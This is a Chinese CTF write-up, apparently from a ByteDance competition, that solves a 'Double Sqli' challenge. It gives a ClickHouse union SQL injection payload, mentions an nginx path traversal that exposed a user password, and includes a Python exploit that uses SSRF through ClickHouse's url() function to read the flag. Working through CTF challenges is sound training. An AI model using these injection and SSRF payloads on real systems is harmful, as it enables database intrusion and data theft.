字节跳动

Double Sqli

本菜鸡做了很长时间才唯一做出来的一道题。报错可以发现是clickhouse数据库,查看文档可以查数据库,表等

1
/?id=-1 union all select name from system.databases--+

最后读到hint,提示需要提权。

在这里插入图片描述

这里需要发现一个 nginx 目录穿越

1
/var/lib/clickhouse/access/xxxx.sql 中发现了数据库中还有一个 user_01 用户,其密码为 e3b0c44298fc1c149afb

这里肯定是用user_01的权限读取flag,后面发现可以用url()函数ssrf打它本地的clickhouse

exp如下:

1
2
3
4
5
6
7
8
9
10
11
import requests

result = ''

test = 'http://39.105.175.150:30001'
param = {
    "id":"-1 union all select * FROM url('http://localhost:8123?user=user_01&password=e3b0c44298fc1c149afb&query=select+flag+from+flag','CSV','column1 String')"
}

res = requests.get(test,params=param)
print(res.text)

Unsecure Blog

万恶的java题目,感觉java虽然很严谨但真的很难。

easy_extract

sp-oauth

ctf
ctf web

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!